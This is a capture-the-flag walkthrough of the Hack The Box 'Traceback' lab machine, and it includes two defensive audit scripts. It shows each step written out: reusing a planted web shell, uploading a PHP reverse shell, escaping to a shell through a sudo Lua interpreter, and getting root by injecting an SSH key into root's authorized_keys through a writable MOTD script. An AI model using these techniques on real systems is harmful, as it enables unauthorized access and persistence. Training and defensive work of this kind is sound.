
Hack The Box walkthrough – Traceback machine
Here we go again today with a new HTB walkthrough – an easy Linux machine: Traceback!

Let’s jump in!
Enumeration
Our nmap (via nmapAutomator) gave me the following output:
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.1.189 Full
Running a Full scan on 10.129.1.189
Host is likely running Linux
---------------------Starting Nmap Full Scan----------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 08:39 EST
Initiating Parallel DNS resolution of 1 host. at 08:39
Completed Parallel DNS resolution of 1 host. at 08:39, 0.01s elapsed
Initiating Connect Scan at 08:39
Scanning 10.129.1.189 [65535 ports]
Discovered open port 80/tcp on 10.129.1.189
Discovered open port 22/tcp on 10.129.1.189
Warning: 10.129.1.189 giving up on port because retransmission cap hit (1).
Connect Scan Timing: About 22.93% done; ETC: 08:41 (0:01:44 remaining)
Connect Scan Timing: About 44.95% done; ETC: 08:41 (0:01:15 remaining)
Connect Scan Timing: About 67.50% done; ETC: 08:41 (0:00:44 remaining)
Completed Connect Scan at 08:41, 136.79s elapsed (65535 total ports)
Nmap scan report for 10.129.1.189
Host is up (0.025s latency).
Not shown: 64757 closed ports, 776 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.88 seconds
Making a script scan on all ports
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 08:41 EST
Nmap scan report for 10.129.1.189
Host is up (0.025s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds
---------------------Finished all Nmap scans---------------------
Completed in 2 minute(s) and 25 second(s)
On port 80 I had the following weird web page:

The source code of this page showed a hint:

<!--Some of the best web shells that you might need ;)-->
With a quick OSINT search I found the following GitHub repository with a list of web shells: https://github.com/TheBinitGhimire/Web-Shells
I had to test all the listed web shells one by one and found that smevk.php exists:

The smevk default credentials let me in (admin/admin)

Foothold
I could upload the php-reverse-shell.php included in Kali Linux in /usr/share/webshells/php/ to get my reverse shell
Don’t forget to edit the variable with your IP address and your listening port:

[email protected]:/home/webadmin$ whoami && id
webadmin
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
I am in!
Lateral Movement
Looking in the home folder, I found a file note.txt containing the following:
[email protected]:/home/webadmin$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
[email protected]:/home/webadmin$
Looking at sudo -l, I got the following output:
[email protected]:/home/webadmin$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
[email protected]:/home/webadmin$
The goal is to spawn a shell with sysadmin permissions. I created a Lua file with the following content:
[email protected]:/home/webadmin$ cat privesc.lua
os.execute("/bin/sh")
Then the following command to reach my goal:
[email protected]:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
$ whoami && id
sysadmin
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$
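Seen from the defender's side, the sudo rule above is the misconfiguration: it lets webadmin run a Lua interpreter as sysadmin without a password. The following audit of `sudo -l` output is an added example, not part of the original walkthrough; the interpreter list, the directory heuristic and the second sample rule are assumptions made for illustration.

```python
import re
from pathlib import PurePosixPath

# Constructed sample: the rule from the sudo -l output above (Defaults line
# shortened), plus one constructed benign rule for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass
User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) /usr/bin/systemctl status apache2
"""

# Assumption: hand-picked, non-exhaustive list of programs that run
# caller-supplied code, so a rule for them grants a shell as the run-as user.
INTERPRETERS = {"lua", "luvit", "python", "python3", "perl", "ruby",
                "node", "php", "sh", "bash"}
# Assumption: top-level directories where binaries are usually not root-managed.
USER_DIRS = {"home", "tmp"}

# "(runas) [TAG: ...] command[, command ...]" as printed by sudo -l
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(text):
    """Return (runas, binary, nopasswd, reasons) for each risky rule."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in filter(None, (c.strip() for c in m["cmds"].split(","))):
            binary = PurePosixPath(cmd.split()[0])
            reasons = []
            if binary.name in INTERPRETERS:
                reasons.append(f"interpreter: arbitrary code as {m['runas']}")
            if binary.parts[1:2] and binary.parts[1] in USER_DIRS:
                reasons.append("binary lives outside root-managed system paths")
            if reasons:
                findings.append((m["runas"], str(binary), nopasswd, reasons))
    return findings

if __name__ == "__main__":
    for runas, binary, nopasswd, reasons in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{binary} as {runas} (NOPASSWD={nopasswd}): {'; '.join(reasons)}")
```

Only the luvit rule is reported, for both reasons; the systemctl rule passes because its binary is neither in the interpreter list nor under a user directory.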
Privilege Escalation
A linpeas scan showed me a potential escalation vector here:

update-motd.d is the folder which contains the scripts that generate the Message Of The Day when you connect via SSH, for example.
And it seems I have write permission. So I can use it to add my SSH public key into root’s authorized_keys file.
First of all I need SSH access as sysadmin:
[email protected]:~/Documents$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:fHyPIzh7o1WdlFcPmJav3hY8X56oFttw+m3e11GgC5E [email protected]
The key's randomart image is:
+---[RSA 3072]----+
| . +. .|
| E = .oo|
| o oo.o|
| . .. .o.o.|
| S o.o+o .|
| o =o++..|
| o o.X.o==|
| +o=.++o*|
| oo.oooooo|
+----[SHA256]-----+
[email protected]:~/Documents$ cat /home/kali/.ssh/id_rsa.pub
ssh-rsa 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 [email protected]
I add our public key to sysadmin’s authorized_keys
echo "ssh-rsa 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 [email protected]" >> /home/sysadmin/.ssh/authorized_keys
I test our connection:
[email protected]:~/Documents$ ssh -i /home/kali/.ssh/id_rsa [email protected]
The authenticity of host '10.129.1.189 (10.129.1.189)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.1.189' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key '/home/kali/.ssh/id_rsa':
Welcome to Xh4H land
Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2
Looks fine. Now I edit the 00-header file as follows:
cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"
echo ssh-rsa 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 [email protected] >> /root/.ssh/authorized_keys
I first connect over SSH as sysadmin, then as root.
[email protected]:~/.ssh$ ssh -i id_rsa [email protected]
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key 'id_rsa':
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Jan 30 08:10:49 2021 from 10.10.14.40
$ exit
Connection to 10.129.1.189 closed.
[email protected]:~/.ssh$ ssh -i id_rsa [email protected]
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key 'id_rsa':
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Jan 24 03:43:29 2020
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
And I am root! Looks like my public SSH key has been correctly copied to root’s authorized_keys
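The escalation works because the MOTD scripts are executed as root at login while a non-root user can write to them. The check below flags that condition; it is an added example, not part of the original walkthrough, and the function name and `trusted_uid` parameter are assumptions made for illustration. The two directory paths are the ones named on this page.

```python
import os
import stat

def audit_root_run_dir(path, trusted_uid=0):
    """Return (path, problem) pairs for anything a non-root user could alter.

    The directory itself is checked too: write access to it is enough to
    replace a script, whatever the mode of the script file.
    """
    findings = []
    targets = [path] + sorted(os.path.join(path, n) for n in os.listdir(path))
    for target in targets:
        st = os.lstat(target)
        if stat.S_ISLNK(st.st_mode):
            findings.append((target, "symlink: audit its target as well"))
            continue
        if st.st_uid != trusted_uid:
            findings.append((target, f"owned by uid {st.st_uid}"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((target, f"group-writable (gid {st.st_gid})"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((target, "world-writable"))
    return findings

if __name__ == "__main__":
    # The live directory and the backup it is restored from (both paths appear
    # on this page); a writable backup is as bad as a writable live copy.
    for directory in ("/etc/update-motd.d", "/var/backups/.update-motd.d"):
        if not os.path.isdir(directory):
            continue
        try:
            for target, problem in audit_root_run_dir(directory):
                print(f"{target}: {problem}")
        except PermissionError as exc:
            print(f"{directory}: cannot inspect ({exc})")
```

On a correctly configured host this prints nothing for either directory; any output means a script that runs as root can be changed by someone other than root.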
EXTRA
Looking at the official HTB write-up, I learnt that I could use pspy (https://github.com/DominicBreuker/pspy) and found out that a process was running every 30 seconds to copy the motd scripts from a backup:
/bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/